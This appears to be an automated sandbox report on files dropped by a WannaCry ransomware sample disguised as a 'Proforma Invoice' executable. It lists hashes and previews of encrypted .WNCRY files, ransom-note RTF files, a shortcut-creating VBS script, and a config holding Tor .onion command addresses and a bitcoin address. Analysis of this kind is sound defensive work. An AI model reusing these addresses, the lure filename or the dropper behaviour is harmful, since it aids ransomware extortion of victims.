                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.795629897227125
                                                          Encrypted:false
                                                          SSDEEP:24:mBPuSe4xfImfpD8KUkTqjlrQZQGYeefH4y/j8stblt3Z9tsa:GE4xfImfpDJDslEZxYecH4tiblpTma
                                                          MD5:01930BD93418A4F570282A35A2818A69
                                                          SHA1:F18EFD623DC4CCF8A012F6C80D7DC364CF90A93E
                                                          SHA-256:07B804492A590F59B714B471FC5264752FE6299B1CBEC1AC8D8C7292EA9E98FE
                                                          SHA-512:8BD03432726B339FC6E31F084D2A72381D9C3EE45785E5796290C43AD310E8D34526627EBA53ED1C4519B14D6D73FF70928DFFAE158FA29F2D0D9F83C6867BBD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:........O...._.NE.z..;./..............X..\.w.u..*...R.H...%d.>.C..8...f2........9..%z.y...h..=.*Fc).-w^.$F\..-.f.....L:.O1. ..C.@+...}.c....p)`.@....Q.$....'...qw...mr*..z.U..[...........4\.....unD.. @....a..u.A........w......$.:..bZh..`S.gp...R$.......R........v.=.n.,^.Sa..w.........$A.).../.<..=k^.8.<...'..%.".|.E...e.BC...b.]...s....*....P...j...{9.9g..(1.lm.sVa.......u./....[..(.........x.....}......q0=e..H(...`.m .v}..,...Q...........^....f...l..*..O4/8<$o.&g....P.,.ar..H.'l..r.52.Jk->..%!.i.Y.....X.o_.9N.9.....)Or0....jOy.L.rA..\.%....W'..O..o..k){.+.Rp..a.3................0O`..3/.....Czd..".b..g..`...V..Yc..0t...`Ey..c.xz!....77A.....e.............`HR.*..f_c.6.....!.e.t........l~.z,.k. .N...y..M.L._..".1....<.q{.......lh.Vt......p...A2.*j..1.}d*..\..+>....p.U.K.....O.."/..|.=.....'.|,../.%..H....*#.Dk.C(.sQ."|....u.u.. }....N. ..`.o.;..8..l.H.-Q/.z....q....?]|..?..{<.......?A......-q?sC.j..>.X4..v.......v.....I.Y..w......

                                                          C:\Users\user\Desktop\WSHEJMDVQC.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.82510156739861
                                                          Encrypted:false
                                                          SSDEEP:24:bkFxwucKFX7r5eJK//W32BBga9eDjh1NdJ4O+tKNsauKYaiN2LK+7s49ZFwFT5js:bkYNKFX7B//796vNzp+tKNdLK+Y493wg
                                                          MD5:805F36E9ADD678E808AA7283A428B43D
                                                          SHA1:FFE417169A11671695D4C52FB8F1246AE8B133BB
                                                          SHA-256:1C966DC5927700C48CD5277C028619F469EABE33351AB9EE5F740E773CFD3F48
                                                          SHA-512:68CC8D0735C0538D6408B818F31E826957B1D25B92ACF78AC37E21E90B0CFCD080704404A2CB6258C77370307D80A6533A85F5C635279C6369241226057E69C9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....:n..vN..:v^....*HQI.p[?.{.5._........2.~G..f...V...K.H..e..!X.g(..8.k.o.c...A...]...5R...*}klP...y.a....9t.....H..s..;w.As\*.9..be.1.A.4...(..L..}..<...?c.......5.....H....*pc.`j..8.<N....G..=UT.kH.!tq....ge{..V8H.KA...}...7T...".O.<...@...D.............H..,..7.{`l.".....<..}wA%.xr..v.....=z".."....Kp..&S...A.,.. Q.."0.G...ag...7.T/L..J0.6.{P.L..s.|........g.,....l..1.$2..*ps....?p..%iB...w.a..4.r.#..Uj...'2X.W.....n.....rQl.U2.9l.C4..!....F.H.M...nGp~a.f.....$(...[23...............(...{.bI.,....H?!`K..W.t"....I1.....~..w.jL...YM..2|..Q#...d..].V.>.D.I.`.j]...%5..9..7..c6.7*..d..rN.....n.fE...^(...[.y....U.{.Wu...^.I..U.....F.........{....$.,..Z.)p..vj#...R...~...-.]..E...V`it._..w..Xe...".Z..+......v....q.m......QG..2.>]...vJ.~.....T1..w.v...DY-.?.".5c{..`.38....f.B.?..T.....~`q.Qg...K2..3...p...G...~c#...6..S.t..$...|......i.m.N....B.-!......._..X.....`..0.._...%. l".K..-...}X.(;.%!...b.7kuq..H+..'m..9..eo.O.^......Uwz

                                                          C:\Users\user\Desktop\WSHEJMDVQC.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.82510156739861
                                                          Encrypted:false
                                                          SSDEEP:24:bkFxwucKFX7r5eJK//W32BBga9eDjh1NdJ4O+tKNsauKYaiN2LK+7s49ZFwFT5js:bkYNKFX7B//796vNzp+tKNdLK+Y493wg
                                                          MD5:805F36E9ADD678E808AA7283A428B43D
                                                          SHA1:FFE417169A11671695D4C52FB8F1246AE8B133BB
                                                          SHA-256:1C966DC5927700C48CD5277C028619F469EABE33351AB9EE5F740E773CFD3F48
                                                          SHA-512:68CC8D0735C0538D6408B818F31E826957B1D25B92ACF78AC37E21E90B0CFCD080704404A2CB6258C77370307D80A6533A85F5C635279C6369241226057E69C9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....:n..vN..:v^....*HQI.p[?.{.5._........2.~G..f...V...K.H..e..!X.g(..8.k.o.c...A...]...5R...*}klP...y.a....9t.....H..s..;w.As\*.9..be.1.A.4...(..L..}..<...?c.......5.....H....*pc.`j..8.<N....G..=UT.kH.!tq....ge{..V8H.KA...}...7T...".O.<...@...D.............H..,..7.{`l.".....<..}wA%.xr..v.....=z".."....Kp..&S...A.,.. Q.."0.G...ag...7.T/L..J0.6.{P.L..s.|........g.,....l..1.$2..*ps....?p..%iB...w.a..4.r.#..Uj...'2X.W.....n.....rQl.U2.9l.C4..!....F.H.M...nGp~a.f.....$(...[23...............(...{.bI.,....H?!`K..W.t"....I1.....~..w.jL...YM..2|..Q#...d..].V.>.D.I.`.j]...%5..9..7..c6.7*..d..rN.....n.fE...^(...[.y....U.{.Wu...^.I..U.....F.........{....$.,..Z.)p..vj#...R...~...-.]..E...V`it._..w..Xe...".Z..+......v....q.m......QG..2.>]...vJ.~.....T1..w.v...DY-.?.".5c{..`.38....f.B.?..T.....~`q.Qg...K2..3...p...G...~c#...6..S.t..$...|......i.m.N....B.-!......._..X.....`..0.._...%. l".K..-...}X.(;.%!...b.7kuq..H+..'m..9..eo.O.^......Uwz

                                                          C:\Users\user\Desktop\b.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                                          Category:dropped
                                                          Size (bytes):1440054
                                                          Entropy (8bit):0.3363393123555661
                                                          Encrypted:false
                                                          SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                                          MD5:C17170262312F3BE7027BC2CA825BF0C
                                                          SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                                          SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                                          SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\Desktop\c.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):780
                                                          Entropy (8bit):2.3807439998647064
                                                          Encrypted:false
                                                          SSDEEP:6:cDm+IQoKvbHaHqHgVcKKfF9mHRMMPRGS37LlN/sUQqGUSGeTsdEC:cjdHaRVcKKfm2MYS3sUQqGLGeTEV
                                                          MD5:8B490F01C03DEE874EA23771FE77ADC1
                                                          SHA1:8ACCBC3670FED62C5BA994FCCCF55631A4ED40A1
                                                          SHA-256:AE4E63BCADE6440D35D1E480C0A4F401DCCB405C3480B9E71EC360863B39465B
                                                          SHA-512:64E788B7FFD903E43BE1DB1EB9BAD7D13DB99294398EC0DA0EDA1B45A4259E09963BB6FFEFD9609F2AD35BC4A819525C6C46A6ECC22A823867FFBC4216C47627
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:............................................................................................................0r.e...........C......................................................12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw................gx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;.......................................................................................................................................https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip...........................................................................................................................................................................................................................................

                                                          C:\Users\user\Desktop\f.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):835
                                                          Entropy (8bit):5.338989222040054
                                                          Encrypted:false
                                                          SSDEEP:24:okTGIUb+OF8kU5KkR2NYeb+BLHUb+OFJ5Kk0Ggh4ANUb+O6:okTGIUb1WkUUkMDb+B7Ub1zUk3gh4MUQ
                                                          MD5:8038CCF5E7F61685688327AA1A0F92A5
                                                          SHA1:0D99C391F3B7B54D84F5ACFB5BDB2B3175163274
                                                          SHA-256:C71B6FE02AE8CAA14B7154087968BC77D0DF7924461453D461CE68539E15C642
                                                          SHA-512:5B58351A4FAAFD1194B1F93AB93C35DC9E12128A4579551030D3387A7FB4AEBB19963B70336202E4BB7F4DF6303920A152D581F87CD14D1EC71E320043D8EA76
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:C:\Users\user\Documents\LIJDSFKJZG\QFAPOWPAFG.mp3.WNCRY..C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410577537420123.txt.WNCRY..C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\48.png.WNCRY..C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js.WNCRY..C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg.WNCRY..C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_16.png.WNCRY..C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\trans[2].gif.WNCRY..

                                                          C:\Users\user\Desktop\m.vbs

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):195
                                                          Entropy (8bit):4.9828343133437905
                                                          Encrypted:false
                                                          SSDEEP:3:gponhvDCKFcsDT6MWlynJ96JS2x9rbPT6MWlynJSK2Fvn:e+hvbGoJgJSoPGoJSK2Fv
                                                          MD5:CF54CCA4CEA475C005EEE306DF7C73D0
                                                          SHA1:1D1A669F4376CBB22A5C5C8D211A352AF84DC95D
                                                          SHA-256:580B3C23A6578CDA3DC3349F3749E935BABC6FA6F2CE9B8DC58D7463C0F618A9
                                                          SHA-512:043F8938BA7CB4F8BBF3E77667E6505271A984578869623102CF8D61A3D9162387DC200F1F8BF97DF5BEE621B0E952DD9F672150777AA18C978E1B95F3B452AE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:SET ow = WScript.CreateObject("WScript.Shell")..SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")..om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe"..om.Save..

                                                          C:\Users\user\Desktop\msg\m_bulgarian.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):47879
                                                          Entropy (8bit):4.950611667526586
                                                          Encrypted:false
                                                          SSDEEP:768:Shef3jHdCG28Eb1tyci8crbEw6/5+3xFkbP0vyzbZrS14e:SheU5De
                                                          MD5:95673B0F968C0F55B32204361940D184
                                                          SHA1:81E427D15A1A826B93E91C3D2FA65221C8CA9CFF
                                                          SHA-256:40B37E7B80CF678D7DD302AAF41B88135ADE6DDF44D89BDBA19CF171564444BD
                                                          SHA-512:7601F1883EDBB4150A9DC17084012323B3BFA66F6D19D3D0355CF82B6A1C9DCE475D758DA18B6D17A8B321BF6FCA20915224DBAEDCB3F4D16ABFAF7A5FC21B92
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_chinese (simplified).wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):54359
                                                          Entropy (8bit):5.015093444540877
                                                          Encrypted:false
                                                          SSDEEP:768:SWjkSFwwlUdcUG2HAmDTzpXtgmDNQ8qD7DHDqMtgDdLDMaDoKMGzD0DWJQ8/QoZ4:SWcwiqDB
                                                          MD5:0252D45CA21C8E43C9742285C48E91AD
                                                          SHA1:5C14551D2736EEF3A1C1970CC492206E531703C1
                                                          SHA-256:845D0E178AEEBD6C7E2A2E9697B2BF6CF02028C50C288B3BA88FE2918EA2834A
                                                          SHA-512:1BFCF6C0E7C977D777F12BD20AC347630999C4D99BD706B40DE7FF8F2F52E02560D68093142CC93722095657807A1480CE3FB6A2E000C488550548C497998755
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\*\falt Batang};}{\f18\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}MingLiU{\*\falt 2OcuAe};}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\f44\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}@\'b9\'d9\'c5\'c1;}..{\f45\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}@MingLiU;}{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}..{\f54\fbidi \fmodern\fchar

                                                          C:\Users\user\Desktop\msg\m_chinese (traditional).wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):79346
                                                          Entropy (8bit):4.901891087442577
                                                          Encrypted:false
                                                          SSDEEP:768:SDwtkzjHdLG2xN1fyvnywUKB5lylYlzlJpsbuEWeM/yDRu9uCuwyInIwDOHEhm/v:SDnz5Rt4D4
                                                          MD5:2EFC3690D67CD073A9406A25005F7CEA
                                                          SHA1:52C07F98870EABACE6EC370B7EB562751E8067E9
                                                          SHA-256:5C7F6AD1EC4BC2C8E2C9C126633215DABA7DE731AC8B12BE10CA157417C97F3A
                                                          SHA-512:0766C58E64D9CDA5328E00B86F8482316E944AA2C26523A3C37289E22C34BE4B70937033BEBDB217F675E40DB9FECDCE0A0D516F9065A170E28286C2D218487C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\*\falt Batang};}..{\f18\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}MingLiU{\*\falt 2OcuAe};}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020

                                                          C:\Users\user\Desktop\msg\m_croatian.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):39070
                                                          Entropy (8bit):5.03796878472628
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdb2YG2+d18Scgn8c8/868H1F8E8/8Z3m8VdAm86a8n:Shef3jHd3G2n+p/mZrS14A
                                                          MD5:17194003FA70CE477326CE2F6DEEB270
                                                          SHA1:E325988F68D327743926EA317ABB9882F347FA73
                                                          SHA-256:3F33734B2D34CCE83936CE99C3494CD845F1D2C02D7F6DA31D42DFC1CA15A171
                                                          SHA-512:DCF4CCF0B352A8B271827B3B8E181F7D6502CA0F8C9DDA3DC6E53441BB4AE6E77B49C9C947CC3EDE0BF323F09140A0C068A907F3C23EA2A8495D1AD96820051C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_czech.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):40512
                                                          Entropy (8bit):5.035949134693175
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2yG2gv8n8+8zfB8k8F8i8k1Z8M8I818E838C8A8s:Shef3jHd2G26nyMZrS14g
                                                          MD5:537EFEECDFA94CC421E58FD82A58BA9E
                                                          SHA1:3609456E16BC16BA447979F3AA69221290EC17D0
                                                          SHA-256:5AFA4753AFA048C6D6C39327CE674F27F5F6E5D3F2A060B7A8AED61725481150
                                                          SHA-512:E007786FFA09CCD5A24E5C6504C8DE444929A2FAAAFAD3712367C05615B7E1B0FBF7FBFFF7028ED3F832CE226957390D8BF54308870E9ED597948A838DA1137B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_danish.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):37045
                                                          Entropy (8bit):5.028683023706024
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHd02wG2roqni2Jeo75Y3kmA31dv61QyU:Shef3jHd4G2M5bZrS14Q
                                                          MD5:2C5A3B81D5C4715B7BEA01033367FCB5
                                                          SHA1:B548B45DA8463E17199DAAFD34C23591F94E82CD
                                                          SHA-256:A75BB44284B9DB8D702692F84909A7E23F21141866ADF3DB888042E9109A1CB6
                                                          SHA-512:490C5A892FAC801B853C348477B1140755D4C53CA05726AC19D3649AF4285C93523393A3667E209C71C80AC06FFD809F62DD69AE65012DCB00445D032F1277B3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_dutch.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):36987
                                                          Entropy (8bit):5.036160205965849
                                                          Encrypted:false
                                                          SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdp2oG2/CzhReo75Y3kmA31dv61Qyz:Sw3BHSWjHdBG2/UhsZrS14f
                                                          MD5:7A8D499407C6A647C03C4471A67EAAD7
                                                          SHA1:D573B6AC8E7E04A05CBBD6B7F6A9842F371D343B
                                                          SHA-256:2C95BEF914DA6C50D7BDEDEC601E589FBB4FDA24C4863A7260F4F72BD025799C
                                                          SHA-512:608EF3FF0A517FE1E70FF41AEB277821565C5A9BEE5103AA5E45C68D4763FCE507C2A34D810F4CD242D163181F8341D9A69E93FE32ADED6FBC7F544C55743F12
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}

                                                          C:\Users\user\Desktop\msg\m_english.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):36973
                                                          Entropy (8bit):5.040611616416892
                                                          Encrypted:false
                                                          SSDEEP:384:S93BHSj2cguALeT+sPzy3EFHjHdM2EG2YLC7O3eo75Y3kmA31dv61QyW:S93BHSTjHd0G2YLCZrS14y
                                                          MD5:FE68C2DC0D2419B38F44D83F2FCF232E
                                                          SHA1:6C6E49949957215AA2F3DFB72207D249ADF36283
                                                          SHA-256:26FD072FDA6E12F8C2D3292086EF0390785EFA2C556E2A88BD4673102AF703E5
                                                          SHA-512:941FA0A1F6A5756ED54260994DB6158A7EBEB9E18B5C8CA2F6530C579BC4455918DF0B38C609F501CA466B3CC067B40E4B861AD6513373B483B36338AE20A810
                                                          Malicious:false
                                                          Reputation:unknown
